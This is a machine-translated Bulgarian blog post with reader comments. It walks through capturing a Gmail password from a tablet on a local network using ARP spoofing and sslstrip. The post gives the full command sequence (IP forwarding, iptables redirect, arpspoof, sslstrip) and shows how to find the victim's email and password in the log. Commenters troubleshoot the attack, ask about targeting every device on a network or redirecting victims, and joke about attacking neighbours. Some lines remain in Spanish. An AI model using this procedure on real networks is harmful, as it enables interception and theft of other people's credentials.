Здравейте блогъри.
За днес имам малка извадка от това колко опасно може да бъде свързването във всяка мрежа без сигурност на тези, които толкова много от нас харесват.
За днес ще използвам ArpSpoofing с Sslstrip, за да получа парола за Gmail. За да направя средата по-контролирана, създадох акаунт, наречен „testarp@gmail.com".
И тъй като не обичам преамбюлите много, нека се захващаме за работа.
ОКОЛЕН СВЯТ
За този тест имаме следното:
1. Нападател: Това е моят настолен или настолен компютър, който има Debian Wheezy. От хранилищата можете да инсталирате sslstrip y dsniff за да имаш подправяне на арфове
2. Жертва: Жертвата е таблет с Android, който иска да види пощата си само през браузъра.
3. Средата: Средата е моя Рутер на Cisco DPC2425
АДРЕСИ.
Адрес на атакуващия: 172.26.0.2
Адрес на рутера: 172.26.0.1
Адрес на жертвата: 172.26.0.8
АТАКАТА:
Първото нещо, което ще направим за тази атака, е да активираме препращането, за да може компютърът ни да препрати информацията на жертвата, без те да забележат. (В противен случай това би било атака за отказ на услуги)
За това ще използваме:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
Тогава как да получим това, което искаме?
Нека първо въведем пощата си на таблета. Докато влизаме, виждаме, че на нашата конзола се появяват хиляди и хиляди неща.
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
с Control + W търсим нещо, наречено SECURE POST.
И ще видим нещо подобно.
Сред тази огромна линия, която не може да се види, е имейл и паролата на жертвата.
Така че тичаме надясно, докато най-накрая видим светлината в края на тунела.
По друг повод ще видим как можем да се предпазим малко от тези атаки.
поздрави
Използвам възможността да кажа, че когато публикацията беше публикувана, командите не бяха правилни.
В командата iptables в края липсва 8080, който е на друг ред. И тогава командите arpspoof бяха на един ред. Всяка команда е на различен ред.
Дано редакторът го види и да го поправи.
Поздрави.
Направих корекциите, които споменавате, добре ли е?
Ако ще вмъквате код в предпочитан запис, използвайте HTML изгледа и проверете дали статията е правилна, преди да я изпратите на чакащо. Благодаря ти.
Смразяващо е да се знае, че тези от нас, които нямат познания, са толкова уязвими. Много добра информация, дори когато разбирам малко от темата, осъзнавам важността. Благодаря ти!
поздрави
Но това работи само ако нападателят и жертвата са в една и съща мрежа. Във всеки случай ми се струва, че ако (в една и съща мрежа) се свържете с HTTPS, това не се случва, защото данните са криптирани ПРЕДИ да напуснете машината си. Ако се свързвате чрез HTTP (без S), мисля, че дори като погледнете мрежовия кабел, виждате ключовете.
Не е вярно. Хаквам gmail парола и ако забележите, че gmail използва https. Така? Въпросът е, че въпреки че https е сигурен, това зависи от http. Така че не е толкова безопасно.
Не признавайте толкова много за https, че S не е за Супермен, а за "безопасно"
работи с или без https, опитах го с по-специализирано дистрибуция на linux и работи без проблеми
Можете точно да го използвате, за да дадете урок на онези, които ви откраднат Wi-Fi. 😀
Горе-долу прилича на това, което те казаха отдавна в блога на Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Остия, чудесно какво прави! / И тогава те казват на моя параноик всеки път, когато използвам VPN, когато отидат да проверят банковата сметка ...). Между другото, трябва да видите колко цинични са хората в коментарите ... ако в крайна сметка крадат ...
Сега трябва да вземем урок за това как да създадем и предложим своя собствена VPN услуга.
Историята, която свързвате, е много интересна, дори изглежда достойна за нова книга и това ме кара да си спомням, когато използвах интернет на съседите си и въпреки че казвам, че познавам темата, мисля, че никога не бих могъл да видя истинските измерения на опасността, която бих могъл да има последно, за мое щастие, те само смениха паролата на WPA2 и там започна моята история с доставчика на хаха
Ето защо заглавието казва Sslstrip в действие.
Действа, стига нападателят да е в средата
Каква вълна работиш на призма? -.-
Не.
Какво чакате, за да изпратите вашата заявка XD
отношение на
добър пост
Интересно, по-късно ще направя образователен тест ... Може би дори бих могъл да премахна паролата за WiFi и да се позабавлявам за малко 😛
Във всеки случай можете ли да направите нещо подобно, за да изпратите различни страници до тези, които целта е поискала? Например, те искат да отворят Facebook и аз да ги пренасоча към Google? 😛
Да. Но всичко е съвсем различно руло.
Може би ще го публикувам по-късно.
много добър пост, тези теми са много образователни, сега трябва да можем да противодействаме на тази атака, тъй като някои (като мен) се свързват с обществени мрежи (университета например), би било полезно да се избегне.
Поздрави!
Не ми се получи 🙁
Тук нещо ме проваля, освен факта, че https връзките са криптирани чрез сертификат на сървъра (след като сертификатът е на вашето устройство, вашият браузър отговаря за криптирането) с iptables пренасочвате порт 80 (http), а не 443 което е https
И аз така си мислех. Въпросът е, че въпреки че https е "защитен", за съжаление зависи от http. Така че sslstrip се възползва от това, кара браузъра да повярва, че използва https идентификационни данни, но не.
Боже! но браузърът трябва да види предупреждение от типа "този сертификат идва от подозрителен сайт или нещо подобно" ... определено ще трябва да направя тестове XD
Не, абсолютно нищо не излиза.
Най-накрая се получи за мен
Свързан съм в WEP мрежа с парола и тя така или иначе ми показа директно паролата.
Запитване. Можете ли да направите същата процедура, но за всички компютри, които са свързани към мрежата, вместо да имате една жертва?
Да, можеш. Но не съм правил експерименти. Опитайте сами и ни кажете как върви.
Единственото нещо, което получавам с това е, че машината на жертвата излиза офлайн, но sslstrip не ми показва нищо: /
Трябва да деактивирате защитната стена за момент. Или поне активирайте входящите връзки.
Сондата и аз виждахме само потребителското име и паролата на страницата във facebook, в gmail не намерих никакви резултати в дневника, също така имах нужда само от ред arpspoof «arpspoof -i -t«. От друга страна, машината-жертва не може да отвори някои страници. Ще продължа да разследвам, много е интересно. Помощ за тези, които използват Manjaro, пакетите за инсталиране са: dsniff (тук е arpspoff), twisted и python2-pyopenssl. Sslstrip можете да изтеглите от тук: http://www.thoughtcrime.org/software/sslstrip/
За да го стартирате $ python2 sslstrip.py
Поздрави.
Не излезе, но линията arpspoof е: #arpspoof -i int -t ip-жертва ip-рутер
вижте, правя точно това, което казвате:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arppoof -i eth0 -t 172.26.0.8 172.26.0.1
arppoof -i eth0 -t 172.26.0.1 172.26.0.2
проблемът е, че жертвата, която е друг компютър, който имам тук в стаята си, нямам връзка до точката, че трябва да рестартирам рутера, какво мога да направя да ми помогне.
Друго нещо е, че работя с виртуална машина и когато изпълня командата iwconfig, wlan0 не се появява, нито когато изпълнявам ifconfig, обаче, ако имам интернет на виртуалната си машина, какво с интерфейс eth0.